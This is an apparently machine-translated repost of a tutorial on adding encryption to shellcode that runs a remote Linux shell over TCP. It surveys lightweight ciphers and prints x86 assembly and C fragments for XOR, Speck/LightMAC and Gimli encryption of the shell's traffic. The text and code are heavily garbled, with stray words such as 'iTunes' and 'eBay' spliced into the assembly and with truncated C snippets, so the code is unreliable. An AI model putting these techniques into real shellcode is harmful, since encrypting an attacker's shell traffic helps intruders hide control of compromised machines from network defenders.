Shulou(Shulou.com)05/31 Report--

This article is about how to implement data encryption in location-independent code that communicates over TCP. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

Preface

How to implement data encryption in location-independent code (PIC) that communicates through TCP.

I will take the synchronous Shell under Linux as a demonstration example

Protocol and code base

When we think about encryption protocols, the first thing that comes to mind is probably secure Transport layer Protocol (TLS), because it is an industrial standard for Web security. Some people may also think of SSH or IPSec, etc., but given the underlying algorithms used by these protocols, they are not suitable for resource-constrained environments. Cryptographic hash functions such as SHA-2 and block ciphers (such as Blowfish) are not designed for less resource-intensive electronic devices such as RFID chips.

In April 2018, NIST implemented a process of standardizing lightweight encryption algorithms in the Internet of things, which took several years to complete, but there is no doubt that the industry will not wait forever because it will expose unsafe products to the Internet. Some cryptographers choose to take an active approach and apply their designed protocols to these low-resource-consuming devices through their own efforts. Two typical algorithms are BLINKER and STROBE, and the corresponding code bases for resource-constrained environments are LibHydrogen and MonoCypher.

Block cipher

There are many kinds of block ciphers, but AES 128 is probably the most suitable algorithm for encrypting online traffic. Here are our test results for different kinds of block ciphers:

Although these encryption algorithms are excellent, they still need similar counters (CTR) and authentication-based encryption modules, of which the most suitable encryption algorithm for message authentication code (MAC) is LightMAC, because it uses the same block cipher in the encryption process.

Stream cipher

The other two popular algorithms for authenticated encryption (AES-GCM replacement) are ChaCha20 and Poly1305, but ChaCha20 uses 200bytes while Poly1305 uses 330bytes. Although Poly1305 has been compressed very small compared to HMAC-SHA2, it still takes up too many resources.

Permutation function

If you spend a lot of time testing various encryption algorithms, you will eventually find that all you need is a permutation function when constructing stream ciphers, block ciphers, encryption authentication models, encrypted hash functions, and random number generators. The following table shows our test results for three functions:

Here we choose to use Gimli because it takes up the least resources and can be used to construct encryption algorithms for traffic.

XOR password

Next, we implement a simple XOR operation for data streams (Just For Fun! ). The screenshot below shows some of the commands sent by a Windows virtual machine to the Linux virtual machine, where the Shellcode running on the Linux platform is not encrypted.

After capturing the communication data between the two hosts, we can see the TCP stream data as follows:

After adding some commands to the Shellcode x86 assembly code, we can perform 8-bit XOR operations:

Read (r, buf, BUFSIZ, 0); xor esi, esi; esi = 0 mov ecx, edi; ecx = buf cdq; edx = 0 mov dl, BUFSIZ; edx = BUFSIZ push SYS_read; eax = SYS_read pop eax int 0x80 Encrypt/decrypt buffer pushad xchg eax, ecxxor_loop: xor byte [eax + ecx-1], XOR_KEY loop xor_loop popad; write (w, buf, len); xchg eax, edx; edx = len mov al, SYS_write pop ebx; s or in [1] int 0x80 jmp poll_wait

By executing the same command in the new session, the communication data will not be directly readable. I used haxdump here to view the commands sent and the results received:

Of course, an 8-bit key cannot effectively prevent an attacker from recovering the plaintext of the communication. The following figure shows how Cyberchef explodes the key:

Speck and LightMAC

At first, I used the following code to verify the encryption of the packet, which uses Encrypt-then-MAC (EtM), and this method is more secure than other methods, such as MAC-then-Encrypt (MtE) or Encrypt-and-MAC (eBay M):

Bits32% defineSPECK_RNDS 27%defineN 8%defineK 16; * *; Light MAC parameters based on SPECK64-128 lodsd; N = 64 words; K = 128 words politics% defineCOUNTERTHLENGTH Nash 2; should be = 64-bits & & w [0] xchg eax, x0 lodsd X1 = x-> w [1] xchg eax, x1 mov esi, ebp; esi = key lodsd xchg eax, K0; K0 = key [0] lodsd xchg eax, K1; K1 = key [1] lodsd xchg eax, K2; K2 = key [2] lodsd xchg eax, K3; K3 = key [3] xor eax, eax I = 0spk_el:; x0 = (ROTR32 (x0,8) + x1) ^ K0; ror x0, 8 add x0, x1 xor x0, K0; x1 = ROTL32 (x1,3) ^ x0; rol x1, 3 xor x1, x0; K1 = (ROTR32 (K1,8) + K0) ^ I; ror K1, 8 add K1, K0 xor K1, eax K0 = ROTL32 (K0,3) ^ K1; rol K0, 3 xor K0, K1 xchg K3, K2 xchg K3, K1; iTunes + inc eax cmp al, SPECK_RNDS jnz spk_el pop edi xchg eax, x0; x-> w [0] = x0 stosd xchg eax, x1 X-> w [1] = x1 stosd popad ret; edx= IN len; ebx= IN msg; ebp= IN key; edi= OUT tag lightmac: pushad mov ecx, edx xor edx, edx add ebp, BLOCK_LENGTH + BC_KEY_LENGTH pushad; allocate N-bytes for M; zero initialize T mov [edi+0], edx; t-> w [0] = 0 Mov [edi+4], edx; t-> w [1] = 0; while we have msg datalmx_l0: mov esi, esp; esi = M jecxz lmx_l2; exit loop ifmsglen = = 0lmx_l1:; add byte to M mov al, [ebx]; al = * data++ inc ebx mov [esi+edx+COUNTER_LENGTH], al inc edx Idx++; M filled? Cmp dl, BLOCK_LENGTH-COUNTER_LENGTH;-- msglen loopne lmx_l1 jne lmx_l2; add S counter in big endian format inc dword [ESP + _ edx]; ctr++ mov eax, [esp+_edx]; reset index cdq; idx = 0 bswap eax; m.ctr = SWAP32 (ctr) mov [esi], eax Encrypt M with E using K1 call ENCRYPT_BLK; update T lodsd; t-> w [0] ^ = m.w [0]; xor [edi+0], eax lodsd; t-> w [1] ^ = m.w [1]; xor [edi+4], eax jmp lmx_l0; keep goinglmx_l2: Add the end bit mov Byte [ESI + edx+COUNTER_LENGTH], 0x80 xchg esi, edi; swap T and Mlmx_l3:; update T with any msg dataremaining mov al, [edi+edx+COUNTER_LENGTH] xor [esi+edx], al dec edx jns lmx_l3; advance key to K2 add ebp, BC_KEY_LENGTH; encrypt T with E using K2 call ENCRYPT_BLK popad Release memory for M popad; restore registers ret; IN:ebp = global memory, edi = msg, ecx = enc flag, edx = msglen;OUT:-1 or length of data encrypted/decryptedencrypt: push-1 pop eax; set return valueto-1 pushad lea ebp, [ebp+@ctx]; ebp crypto ctx mov ebx, edi; ebx = msg pushad Allocate 8-bytes fortag+strm mov edi, esp; edi = tag; if (enc) {; verify tag+ decrypt jecxz enc_l0; msglen-= TAG_LENGTH; sub edx, TAG_LENGTH jle enc_l5; return-1 if msglen estrangctrary BLOCKLENGTH); mov esi, [esp+_ebp] Esi = ctx- > e_ctr push edi movsd movsd mov ebp, esi pop esi; ENCRYPT_BLK (ctx- > e_key, & strm); call ENCRYPT_BLK mov cl, BLOCK_LENGTH; r = (len > BLOCK_LENGTH)? BLOCK_LENGTH: len;enc_l2: lodsb; al = * strm++ xor [ebx], al * msg ^ = al inc ebx; msg++ dec edx loopnz enc_l2; while (! ZF&&-- ecx) mov cl, BLOCK_LENGTH enc_l3:; do {; update counter mov ebp, [esp+_ebp] inc byte [EBP + ecx-1] loopz enc_l3 } while (ZF&&-- ecx) jmp enc_l0enc_lx:; encrypting? Add MAC of ciphertext dec dword [esp + _ ecx] mov edx, [esp+_edx] jz enc_l4 mov edi, ebx mov ebx, [esp+_ebx] mov ebp, [esp+_ebp]; GET_MAC (ctx, buf, buflen, msg); call GET_MAC; msglen + = TAG_LENGTH; add edx, TAG_LENGTHenc_l4:; return msglen Mov [esp+32+_eax], edx enc_l5: popad popad ret

It should be noted that a protocol is also used here, and the receiver needs to know how much data the sender has sent before verifying the validity of the data, so the encryption length needs to be sent first, followed by encrypted data. But please wait a minute, this is obviously supposed to be Shellcode, why is it so complicated now? Try RC4? No, please look down!

Gimli

To use Gimli instead of RC4, I wrote the following code, where the replacement function is essentially Gimli:

# defineR (vcrypt_ctx n) (v) > > (n)) | ((v) fdr = r; c-> fdw = w; for (uint8_t*) key) [I% 16] ^ gf_mul (I);} permute (c-> s); c-> idx = 0;} / / encrypt or decrypt buffervoidcrypt (crypt_ctx * c) {int I, len / / read from socket or stdout len = read (c-> fdr, c-> buf, BUFSIZ); / / encrypt/decrypt for (iDX > = 32) {permute (c-> s); c-> idx = 0;} c-> buf [I] ^ = c-> s [c-> idx++];} / / write to socket or stdin write (c-> fdw, c-> buf, len);}

Before using this code in Linux Shell, we need to declare two separate encryption contexts to handle input, output, and 128-bit static keys:

/ / using a static 128-bit key crypt_ctx * c, C1, c2; / / echo-n top_secret_key | openssl md5-binary-out key.bin / / xxd-I key.bin uint8_t key [] = {0x4f, 0xef, 0x5a, 0xcc, 0x15, 0x78, 0x01, 0xee, 0xa1, 0x4e, 0x24, 0xf1, 0xac, 0xf9

Before entering the main output loop, we also need to read and write descriptors to each context initialization file, which reduces the number of lines of code:

/ C1 is for reading from socket andwriting to stdin init_crypt (& C1, s, in [1], key); / c2 is for reading from stdout andwriting to socket init_crypt (& c2, out [0], s, key); / / now loop until user exits or someother error for (;;) {r = epoll_wait (efd, & evts, 1mai 1) / / error? Bail out if (r)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.